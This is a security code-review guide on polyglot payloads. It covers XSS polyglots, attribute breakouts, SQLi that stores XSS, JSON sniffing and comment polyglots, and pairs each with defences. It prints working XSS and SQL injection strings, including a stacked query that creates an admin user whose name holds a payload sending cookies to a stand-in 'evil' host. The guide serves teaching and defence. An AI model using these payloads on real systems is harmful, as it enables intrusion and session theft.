Polyglot Payloads Code Review Guide
What Is a Polyglot Payload?
A polyglot payload is a single byte sequence that is valid input to more than one parser at the same time. The same string parses as HTML and as JavaScript; the same file opens as a PDF and a ZIP; the same config loads as valid YAML and valid JSON. Attackers craft polyglots because modern defences are layered: a WAF looks at one grammar, a server-side encoder at another, a browser at a third, a stored-data consumer at a fourth. A payload that satisfies every grammar gets waved through every layer, and the attacker's code runs wherever the weakest link decides to execute it.
Polyglots are often confused with parser differentials, but the two are structurally opposite. A parser differential is an input where two parsers disagree about the meaning of the same bytes — the attacker hides in the gap between interpretations. A polyglot is an input where every parser agrees the bytes are well-formed — the attacker wins because each parser happily extracts a different meaningful program from the same text. Reviewing for one class sharpens your eye for the other, but the fix patterns are different.
Context-aware encoding is not enough
The standard advice — "use a context-aware encoder: HTML encoder for HTML, JS encoder for JS, URL encoder for URLs" — assumes you know which grammar the output will ultimately be parsed in. Polyglots attack that assumption directly. A payload that is simultaneously a valid HTML attribute, a valid JS string, and a valid CSS value defeats any single-context encoder because the attacker chose the payload knowing which encoder you will use.
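A minimal sketch of why a single-context encoder falls short, using only Python standard-library encoders. The payload string and the helper name `encode_for` are illustrative assumptions, not part of any particular framework.

```python
import html
import json
from urllib.parse import quote

# Illustrative payload: inert as plain text, dangerous in several contexts.
PAYLOAD = '</script><img src=x onerror=alert(1)>" onfocus="alert(2)'


def encode_for(context: str, value: str) -> str:
    """Encode `value` for one named output context (hypothetical helper)."""
    if context == "html":
        # Escapes &, <, > and, with quote=True, both quote characters.
        return html.escape(value, quote=True)
    if context == "js_string":
        # Produces a double-quoted JS/JSON string literal.
        return json.dumps(value)
    if context == "url_component":
        # Percent-encodes everything except unreserved characters.
        return quote(value, safe="")
    raise ValueError(f"unknown context: {context}")


html_out = encode_for("html", PAYLOAD)
js_out = encode_for("js_string", PAYLOAD)
url_out = encode_for("url_component", PAYLOAD)

# Each encoder is safe for its own grammar only. The JS-string encoder leaves
# "</script>" intact, so its output still breaks out of an inline <script> block.
print("</script>" in js_out)   # True
print("<" in html_out)         # False
print("<" in url_out)          # False
```

The point of the sketch is that "encoded" is never a property of the data alone: the same bytes are safe or unsafe depending on which grammar eventually reads them.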
One Input, Many Grammars
[Diagram: the single input ";!--"<XSS>=&{()} is fed to several parsers, each of which accepts it for its own reason. Lane notes that survive: <XSS> is an unknown tag, but a valid one; attribute state accepts ;!-- as junk; // sibling (-- is fine), and a label; {, then accepts whatever block follows; -- is a line comment, and everything after it is ignored until newline.]
The pattern: a polyglot is a single byte sequence crafted so that every parser in the pipeline accepts it and reads something useful out of it. Unlike a parser differential, where two parsers disagree on meaning, a polyglot succeeds because all parsers agree it is well-formed, each for its own reason.
The diagram above is the fundamental shape: one input, multiple grammar-checkers, each one independently happy. The attacker does not need the checkers to disagree; they need them to all agree that the input is fine, while each also executing a useful fragment of it. The review discipline, as we will see, is to stop relying on grammar-level acceptance as a security signal and start pinning outputs to one grammar at a time — with CSP, with strict Content-Type plus nosniff, with typed parsers that reject ambiguity, and with strong output encoders that know their exact target context.
A reviewer flags a payload that passes WAF, passes the server-side HTML encoder, and yet fires an alert when rendered in the browser. They call it a 'WAF bypass'. What framing is more useful?
Classic XSS Polyglots
The canonical XSS polyglot is the payload by Ahmed Elsobky (@0xSobky), later refined by Gareth Heyes, that fires in every major injection context a web app exposes: HTML body, HTML attribute (single, double, and unquoted), javascript: URL, <script> block, <style>, <title>, <textarea>, and SVG. It is the single most useful piece of test content a reviewer can hand to a new scanner: if it fires on a page, that page is exploitable somewhere.
The Heyes/Elsobky XSS polyglot (annotated)

    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

    # How each segment is engineered:
    # jaVasCript:                   -> survives href/src/action contexts as a javascript: URL
    # /* ... */                     -> JS block comment; ignored by JS, passed by HTML tokenizer
    # ` and \`                      -> template-literal close to survive backticked string context
    # ' and "                       -> close single- and double-quoted JS string contexts
    # (/* */oNcliCk=alert() )       -> HTML attribute; mixed case to bypass naive case-sensitive filters
    # //%0D%0A%0d%0a//              -> CR/LF terminator for javascript:-URL line comment
    # </stYle/</titLe/</teXtarEa/   -> breaks out of raw-text elements that normally swallow tags
    # </scRipt/--!>                 -> breaks out of <script> blocks, tolerates HTML --!> quirk
    # \x3csVg/<sVg/oNloAd=alert()   -> two SVG vectors; one hex-encoded for attribute contexts
    # //>\x3e                       -> trailing comment + > to close whatever tag consumed the prefix

Notice what makes it a polyglot rather than just a long attack string. Every segment is either (a) valid syntax in the grammar of the context it is targeting, or (b) comment/whitespace in grammars where it is not active. The mixed case (oNcliCk, jaVasCript) is not accidental: HTML attribute names are ASCII-case-insensitive, JS identifiers are case-sensitive. A regex filter written for one grammar misses the payload in the other.
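The case-sensitivity mismatch can be shown in a few lines. This is a sketch under stated assumptions: the two regular expressions and the function names are hypothetical stand-ins for a real filter, and the handler list is deliberately short.

```python
import re

# One segment of the polyglot shown above.
POLYGLOT_FRAGMENT = "(/* */oNcliCk=alert() )"

# A deny-list written with case-sensitive matching, as if for JS identifiers.
NAIVE_EVENT_HANDLER = re.compile(r"on(click|load|error|focus)\s*=")

# The same pattern matched the way the HTML tokeniser treats attribute names:
# ASCII-case-insensitively.
HTML_AWARE_EVENT_HANDLER = re.compile(
    r"on(click|load|error|focus)\s*=", re.IGNORECASE
)


def naive_filter_flags(value: str) -> bool:
    """True if the case-sensitive deny-list would flag the value."""
    return NAIVE_EVENT_HANDLER.search(value) is not None


def html_aware_filter_flags(value: str) -> bool:
    """True if the case-insensitive deny-list would flag the value."""
    return HTML_AWARE_EVENT_HANDLER.search(value) is not None


print(naive_filter_flags(POLYGLOT_FRAGMENT))       # False
print(html_aware_filter_flags(POLYGLOT_FRAGMENT))  # True
```

Even the case-insensitive version remains a deny-list, so it only narrows the gap. It does not replace encoding for the exact output context.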
Contexts the polyglot covers
| Context | How it fires | What the filter missed |
|---|---|---|
| HTML body (unescaped) | `<sVg/oNloAd=alert()>` lands as an inline SVG event handler. | Filter stripped `<script>` but not `<svg>`. |
| HTML attribute (double-quoted) | `"` closes the value; `oNcliCk=alert()` is a new attribute. | Encoder did not escape the closing quote for the specific quote style in use. |
| HTML attribute (single-quoted) | Same trick with `'`; mixed-case event name bypasses lowercase deny-lists. | Deny-list of event handlers was case-sensitive. |
| `javascript:` URL (href, formaction) | Entire string parses as JS: the leading segments are comments, `oNcliCk=alert()` is an assignment expression, and evaluating its right-hand side runs `alert()`. | Validator blocked `javascript:` with a case-sensitive string-prefix check, so a mixed-case scheme slipped through. |
| Inside `<script>` / template literal | Backtick and quote close the surrounding string; the rest executes. | Template literal was built by string concatenation rather than a tagged template. |
| Inside `<style>` / `<title>` / `<textarea>` | The `</tag>` sequences break out of raw-text elements. | Output was placed in a raw-text element, where HTML encoding does *not* help. |
Why one payload instead of seven
A reviewer's instinct is often "I have an encoder for each context, one payload per context is fine." The polyglot exists precisely because the reviewer does not always know which context the output will end up in. Templates get copy-pasted, data gets reused, a field that was a title attribute yesterday becomes a srcdoc tomorrow. A single payload that fires in all contexts is how you find the one context you forgot about.
A scanner reports that the Heyes polyglot fires on a profile page when set as the user's display name. The server-side encoder is HTML-entity-escaping the display name before rendering. Why does the payload still execute?
JS + HTML + Attribute Contexts
The richest polyglot territory is the seam between HTML attribute state and JavaScript. HTML attribute values are parsed by a tokeniser that handles quoting, entity decoding, and state transitions; the value of an event-handler attribute or a javascript: URL is then handed to the JS engine for evaluation. Each grammar has rules the other ignores, and polyglots live in the overlap.
Three Lanes, Three States, Same Bytes
Input: " onfocus=alert(1) autofocus x="
HTML tokeniser
- State: attribute-value (double-quoted)
- Reads " → ends the current attribute value
- Reads onfocus → new attribute name
- Reads =alert(1) → its value
- Reads autofocus → a second, boolean attribute
JS engine
- State: source text
- Never reaches it directly: the injected string as a whole never enters a JS context
- The string is not parsed as JS at all
- alert(1) is executed because the HTML parser promoted it into one (an event-handler attribute value)
Server-side encoder
- State: thinks the output is an attribute value
- Escapes <, >, &
- Does not escape the closing "
- Ships the payload unchanged into HTML
The three-lane attribute-breakout payload

    <!-- The template: -->
    <input type="text" value="USER_INPUT">

    <!-- USER_INPUT = " onfocus=alert(1) autofocus x=" -->

    <!-- After server-side templating: -->
    <input type="text" value="" onfocus=alert(1) autofocus x="">

    <!-- What the HTML tokeniser sees:
           type="text"       attribute #1 (unchanged)
           value=""          attribute #2 (closed by injected ")
           onfocus=alert(1)  attribute #3 (new event handler)
           autofocus         attribute #4 (boolean)
           x=""              attribute #5 (trailing garbage, harmless)
         The <input> now auto-focuses and fires alert(1) on render. -->

The injected bytes contain not a single HTML-special character the encoder is likely to escape: no <, no >, no &. The only "bad" character is the straight double-quote, and encoders often pass it through untouched when they were written for an HTML-body context (where " has no special meaning). This is how an encoder that is "working correctly" still ships a stored XSS.
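The same breakout can be reproduced with Python's standard `html.escape`, which exposes both behaviours through its `quote` flag. The template string below is an assumption that mirrors the listing above, not a real templating engine.

```python
import html

# Stand-in for the server-side template shown above.
TEMPLATE = '<input type="text" value="{value}">'
USER_INPUT = '" onfocus=alert(1) autofocus x="'

# Body-context escaping: only &, <, > are escaped. The double quote passes through.
body_encoded = html.escape(USER_INPUT, quote=False)

# Attribute-context escaping: both quote characters are escaped as well.
attr_encoded = html.escape(USER_INPUT, quote=True)

broken = TEMPLATE.format(value=body_encoded)
safe = TEMPLATE.format(value=attr_encoded)

print(broken)  # the injected " closes value and onfocus becomes a new attribute
print(safe)    # the payload stays inside the value attribute as inert text
```

Both calls are "correct" HTML escaping. Only the second is correct for a double-quoted attribute value, which is the context the template actually uses.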
Href, src, srcdoc: three sinks, three grammars

    <!-- href: the value is re-parsed as a URL, then again as JS if scheme is javascript: -->
    <a href="USER_INPUT">...</a>
    <!-- USER_INPUT = jaVasCript:alert(1) -->
    <!-- Bypass: scheme check compared against 'javascript:' case-sensitively, missed mixed case -->

    <!-- src on an iframe: same re-parse as URL, even stricter CSP context -->
    <iframe src="USER_INPUT"></iframe>
    <!-- USER_INPUT = data:text/html,<script>alert(1)</script> -->
    <!-- Bypass: the scheme validator never considered data:, and HTML-encoding the value
         does not neutralise a data: URL -->

    <!-- srcdoc: the ENTIRE attribute value is re-parsed as an HTML document -->
    <iframe srcdoc="USER_INPUT"></iframe>
    <!-- USER_INPUT = <script>alert(1)</script> -->
    <!-- Bypass: the outer encoder emits &lt;script&gt;..., but the browser DECODES those
         entities while parsing the attribute value, so the srcdoc document it then
         re-parses contains a live <script> -->

srcdoc is a double-parse sink
Any attribute whose value is itself a grammar — srcdoc (HTML), style (CSS), href (URL, with optional JS via javascript:) — is a polyglot goldmine. The outer parser (HTML attribute) and the inner parser (the attribute's own grammar) each apply their own escape/decode rules, and attacker bytes can cross the boundary. Treat every such sink as a two-step output and encode for both steps, or better, do not pass user data to them at all.
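For the URL-valued sinks, one common pattern is to allowlist on the parsed scheme rather than deny-list on a string prefix. A minimal sketch, assuming only absolute http(s) links are wanted; the function names and the allowlist are illustrative.

```python
from urllib.parse import urlsplit

# Assumption: only absolute http(s) links are acceptable in this sink.
ALLOWED_SCHEMES = {"http", "https"}


def naive_is_safe(url: str) -> bool:
    """Case-sensitive deny-list: the kind of check a mixed-case scheme defeats."""
    return not url.startswith("javascript:")


def is_allowed_link(url: str) -> bool:
    """Allowlist on the parsed scheme; urlsplit returns the scheme lowercased."""
    try:
        parts = urlsplit(url)
    except ValueError:
        # Malformed input is rejected rather than guessed at.
        return False
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


print(naive_is_safe("jaVasCript:alert(1)"))    # True: the deny-list is bypassed
print(is_allowed_link("jaVasCript:alert(1)"))  # False
print(is_allowed_link("data:text/html,<script>alert(1)</script>"))  # False
print(is_allowed_link("https://example.com/profile"))  # True
```

This rejects relative URLs by design. Browsers also normalise URLs in ways a server-side parser may not, so the check belongs alongside attribute encoding and CSP, not in place of them.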
A diff adds `<iframe srcdoc={userBio}>` to a profile component. The bio field is already HTML-entity-escaped at the boundary. Is this safe?
SQLi + XSS Combined Payloads
A polyglot payload that is simultaneously a valid SQL fragment and a valid HTML snippet lets an attacker turn one injection into two. The classic form is stored XSS delivered through SQL injection: the SQLi inserts attacker-controlled bytes into a database column, and the stored value is later rendered in an admin dashboard or customer-support tool. Because the two injection points are on different pages with different defences, a single polyglot bypasses both.
SQLi payload that stores XSS

    -- The attacker controls the 'search' parameter of a public endpoint.
    -- The server builds a query by string concatenation (the original bug).
    SELECT id, name FROM users
    WHERE name LIKE '%SEARCH%';

    -- Attacker input (assumes the driver allows stacked statements):
    --   %'; INSERT INTO users(name, role) VALUES
    --   ('<img src=x onerror=fetch("//evil/"+document.cookie)>', 'admin'); --

    -- The resulting statement (after concat):
    SELECT id, name FROM users
    WHERE name LIKE '%%'; INSERT INTO users(name, role) VALUES
    ('<img src=x onerror=fetch("//evil/"+document.cookie)>', 'admin'); --%';

    -- Two things happen:
    -- 1. A new admin user is created, whose "name" is an HTML <img> tag.
    -- 2. Nothing on this page renders the name; the SQLi succeeds silently.

What the admin sees later

    <!-- On the admin user-management page, the new row is rendered: -->
    <tr>
      <td>4711</td>
      <td><img src=x onerror=fetch("//evil/"+document.cookie)></td>
      <td>admin</td>
    </tr>

    <!-- The admin template used {{ user.name | raw }} because it "was trusted server data".
         The image fails to load, onerror fires, the admin's session cookie is exfiltrated. -->

The two injections are often reviewed by different teams. The SQLi reviewer sees a concatenated query on a public endpoint and thinks "should be a parameterised query, shrug, fix it next sprint." The XSS reviewer sees an admin-only page and thinks "trusted internal data, skip the encoder." Each is half-right; the polyglot weaves them into a full compromise. The review rule is universal: no data is "trusted" on the read path simply because writes to it were supposed to be validated on a different page.
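Both halves of the fix can be sketched with the standard library: a bound parameter on the write/search path and encoding at render time on the read path. The table layout, the function names, and the use of an in-memory SQLite database are assumptions for illustration, and `alert(1)` stands in for the exfiltration call.

```python
import html
import sqlite3

# The attacker input from the listing above, with alert(1) as a stand-in.
ATTACK = (
    "%'; INSERT INTO users(name, role) VALUES "
    "('<img src=x onerror=alert(1)>', 'admin'); --"
)


def search_users(conn: sqlite3.Connection, term: str) -> list[tuple[int, str]]:
    # The term is bound as data, so it can never terminate the string literal.
    pattern = f"%{term}%"
    return conn.execute(
        "SELECT id, name FROM users WHERE name LIKE ?", (pattern,)
    ).fetchall()


def render_row(user_id: int, name: str, role: str) -> str:
    # Encode at render time, whatever the write path promised.
    return (
        f"<tr><td>{user_id}</td>"
        f"<td>{html.escape(name, quote=True)}</td>"
        f"<td>{html.escape(role, quote=True)}</td></tr>"
    )


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
conn.execute("INSERT INTO users(name, role) VALUES ('alice', 'user')")

results = search_users(conn, ATTACK)
user_count = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
row_html = render_row(4711, "<img src=x onerror=alert(1)>", "admin")

print(results)     # no rows match, and no INSERT was executed
print(user_count)  # still the single seeded user
print(row_html)    # the <img> tag is rendered as text
```

Either control alone leaves one half of the chain open, which is why the read path encodes even data that the write path is believed to have validated.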
Double-encoding is not a fix
A common wrong turn: "we will HTML-encode on write and on read, to be safe." That breaks legitimate data (user display names containing &, <) and gives a false sense of security — the right fix is parameterised queries and context-aware output encoding at render time, not string-stuffing the data at rest. Defence in depth is not the same as duplicate encoding.
- SQLi + SSTI: stored Jinja/Twig/ERB tags survive until an admin page renders them through a template engine.
- SQLi + CSV injection: a stored value beginning with =, +, @, or - becomes an active formula when exported to Excel.
- SQLi + log injection: newlines plus fake log lines land in an ELK pipeline that does not sanitise on read.
- SQLi + email injection: \r\nBcc: headers survive in a stored template and fire the next time a notification is sent.
- ORM query fragment + raw SQL polyglot: a string that is a valid ORM filter and a SQL injection for the underlying driver when the ORM falls back to raw.
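As one illustration of treating stored data as untrusted on the read path, the CSV case from the list above can be sketched as follows. Prefixing formula-like cells with an apostrophe is a commonly recommended mitigation, assumed here rather than taken from this guide, and the helper names are hypothetical.

```python
import csv
import io

# The leading characters named in the list above.
FORMULA_PREFIXES = ("=", "+", "-", "@")


def neutralise_cell(value: str) -> str:
    """Prefix formula-like cells with an apostrophe so they are read as text."""
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value


def export_rows(rows: list[list[str]]) -> str:
    """Write rows to CSV text, neutralising every cell on the way out."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buffer.getvalue()


exported = export_rows([["alice", '=HYPERLINK("http://evil.example")']])
print(exported)
```

The trade-off is that legitimate values such as negative numbers are altered too, so a real exporter would likely apply this only to free-text columns.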
A reviewer finds a stored value in a users table that reads `<img src=x onerror=...>`. The public endpoint that accepts name updates uses parameterised queries and rejects anything longer than 80 characters. Where did the polyglot come from?
JSON + JS + HTML Ambiguity
JSON was designed as a subset of JavaScript. For a long time that made eval() a tempting parser, and it is still true that any valid JSON text is a valid JavaScript expression (strictly so only since ES2019, which allowed U+2028 and U+2029 inside string literals). The consequence is an entire polyglot family: inputs that are simultaneously valid JSON, valid JS, and, if the response Content-Type is wrong, parseable as HTML by a browser that falls back to sniffing.
JSON that is also executable JavaScript

    // An endpoint returns what the developer thinks is "just data":
    // GET /api/profile -> [{"name": "alice", "cb": "notify"}]
    //
    // Another page on another origin embeds it via <script src>:
    // <script src="https://victim.example/api/profile"></script>
    //
    // Because the response Content-Type is text/html (wrong), or missing, or the
    // server failed to set X-Content-Type-Options: nosniff, AND because a top-level
    // JSON array parses as a valid JavaScript expression statement, a legacy browser
    // lets the attacker's page observe the contents cross-origin through side effects
    // (an overridden Array constructor or setters on Object.prototype).
    // This is the JSONP-without-consent family ("JSON hijacking").
    //
    // Mitigation has been standard for a decade but still fails in the wild:
    //
    // 1. Always set Content-Type: application/json; charset=utf-8
    // 2. Always set X-Content-Type-Options: nosniff
    // 3. Never begin a JSON response with a top-level array (legacy Firefox/Safari
    //    issue); always wrap in an object
    // 4. For sensitive responses, prefix with )]}', which makes the body a syntax
    //    error when loaded via <script src> and is stripped by your client-side
    //    fetch wrapper
    // 5. Require a custom header or SameSite=Strict cookie on reads
    //
    // Skip any of these and an attacker's page can `new Function(response)` you.

The polyglot sharpens when the JSON contains attacker-controlled strings. Consider a profile endpoint whose bio field is user-provided. A response like {"bio": "</script><img onerror=alert(1) src=x>"} is perfectly valid JSON. If a browser sniffs the response as HTML (because Content-Type is text/html or missing and nosniff is absent), the </script><img> turns into a live DOM node. The bytes are a single polyglot: valid JSON and valid HTML.
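One way to keep such a response from doubling as HTML is to make sure the serialised JSON contains no HTML-significant bytes at all, and to add the `)]}'` prefix mentioned in the mitigation list. A minimal sketch; the helper names and the exact prefix terminator (a newline) are assumptions.

```python
import json

# Prefix that turns the body into a syntax error if loaded as a script.
XSSI_PREFIX = ")]}'\n"

# In JSON text these characters can only occur inside strings, so replacing
# them with \uXXXX escapes changes the bytes but not the parsed value.
_HTML_SENSITIVE = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def dump_json_for_http(payload: dict) -> tuple[dict[str, str], str]:
    """Return (headers, body) for a JSON response (hypothetical helper)."""
    body = json.dumps(payload)
    for char, escaped in _HTML_SENSITIVE.items():
        body = body.replace(char, escaped)
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, XSSI_PREFIX + body


def parse_prefixed_json(body: str) -> dict:
    """Client-side counterpart: strip the prefix, then parse."""
    if not body.startswith(XSSI_PREFIX):
        raise ValueError("missing XSSI prefix")
    return json.loads(body[len(XSSI_PREFIX):])


profile = {"bio": "</script><img onerror=alert(1) src=x>"}
headers, body = dump_json_for_http(profile)
print(body)
```

A JSON parser reads the original string back from the escaped body, while an HTML parser finds no tag to open.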
The full defence in two headers

    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    X-Content-Type-Options: nosniff
    Cache-Control: no-store

    {"bio":"</script><img onerror=alert(1) src=x>"}

    # With both headers:
    # - Modern browsers REFUSE to sniff the response as HTML or as script.
    # - Embedding the URL via <script src> produces a Content-Type blocking error.
    # - Rendering the URL directly in a window shows raw JSON, not executed HTML.
    #
    # Without nosniff:
    # - IE/legacy browsers sniff a small prefix of the body and, if it "looks like"
    #   HTML, render it as such.
    # - Even some hardened browsers relaxed sniffing rules for compatibility.
    #
    # Without Content-Type:
    # - Worst case. Every client picks a default based on URL extension, body
    #   contents, or cached rules, and attackers have a field day.

UTF-7, BOMs, and the charset polyglot
Legacy browsers would auto-detect character encoding from byte patterns. A payload encoded as UTF-7 looks like inert ASCII, but a browser that sniffs UTF-7 reinterprets +ADw-script+AD4- as <script>. BOMs (EF BB BF for UTF-8, FE FF or FF FE for UTF-16, depending on byte order) similarly flip a parser into a different mode. Always set an explicit charset, always set nosniff, and strip BOMs from user-provided input before it ever reaches an output buffer.
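Both effects are easy to reproduce with Python's `codecs` module. The sketch below shows the UTF-7 reinterpretation and a small BOM-stripping helper; `strip_bom` is a hypothetical name, and it removes a single leading BOM only.

```python
import codecs

# UTF-32 signatures are checked first: the UTF-32 LE BOM begins with the
# same two bytes as the UTF-16 LE BOM.
_BOMS = (
    codecs.BOM_UTF32_LE,
    codecs.BOM_UTF32_BE,
    codecs.BOM_UTF8,
    codecs.BOM_UTF16_LE,
    codecs.BOM_UTF16_BE,
)


def strip_bom(data: bytes) -> bytes:
    """Remove one leading byte-order mark, if present."""
    for bom in _BOMS:
        if data.startswith(bom):
            return data[len(bom):]
    return data


# Inert-looking ASCII that a UTF-7 decoder turns into markup.
utf7_payload = b"+ADw-script+AD4-"
decoded_as_utf7 = utf7_payload.decode("utf-7")
decoded_as_ascii = utf7_payload.decode("ascii")

print(decoded_as_ascii)  # +ADw-script+AD4-
print(decoded_as_utf7)   # <script>
```

The same bytes yield harmless text or a tag depending solely on which decoder is chosen, which is why the charset has to be declared by the server and never guessed by the client.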
An API returns user profile data as JSON with Content-Type: application/json but without X-Content-Type-Options: nosniff. The profile bio is user-provided. What is the attack?
Comment-Syntax Polyglots
Most languages support more than one comment syntax, and the overlaps between languages are striking. A single physical line can be: a C-style line comment (//) in JavaScript, a shell comment (#) in Python or Bash, a SQL line comment (--), or an HTML comment (<!-- -->). A polyglot exploits these overlaps to include executable code in one grammar while appearing inert in another.
[Table: Comment tokens across languages]
[Listing: A comment polyglot: valid JS + valid Python + valid Bash]
The practical security relevance is config files and CI inputs. A YAML file that is also a shell script (via # comments and clever YAML folding) can be fed to both yaml.safe_load() and bash with two different meanings. A Markdown file that is also HTML (because Markdown passes through HTML) can contain an <img onerror> that renders live when a previewer skips sanitisation. The review rule is: if a file crosses a boundary where its interpreter might change, the file format must be committed at ingestion, not inferred at consumption.
Shebang + fallback trick
A favourite is the shebang-polyglot: #!/bin/sh at the top, with the rest of the file structured so that sh falls through to an exec python3 "$0" line, so the file runs as shell first and hands itself to Python. It is benign when you write it on purpose, and a live bug when an uploaded file with a tolerated #! line lands on a system that inspects file type by extension alone.
Your CI pipeline runs a user-supplied config file through yaml.safe_load() and, separately, through a custom 'comment extractor' that collects lines starting with '#' for documentation. What is the subtle polyglot risk?
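The shebang-plus-fallback trick described in this section can be sketched as a single file that is valid for both POSIX sh and Python. The layout below is one well-known form of it. The `has_shebang` helper is a hypothetical upload-side check, added as an assumption about how a reviewer might flag such files.

```python
#!/bin/sh
"exec" "python3" "$0" "$@"  # sh: re-runs this file under python3. Python: a discarded string expression.


def main() -> str:
    """Only Python ever reaches this code; sh has already exec'd away."""
    return "running under Python"


def has_shebang(data: bytes) -> bool:
    """Upload-side check: flag content starting with '#!' whatever its extension."""
    return data.startswith(b"#!")


if __name__ == "__main__":
    print(main())
```

Under sh, the second line replaces the shell process with `python3` running the same file. Under Python, the same line is four adjacent string literals that concatenate into an unused expression. A check on the file's leading bytes catches the pattern where an extension-based check does not.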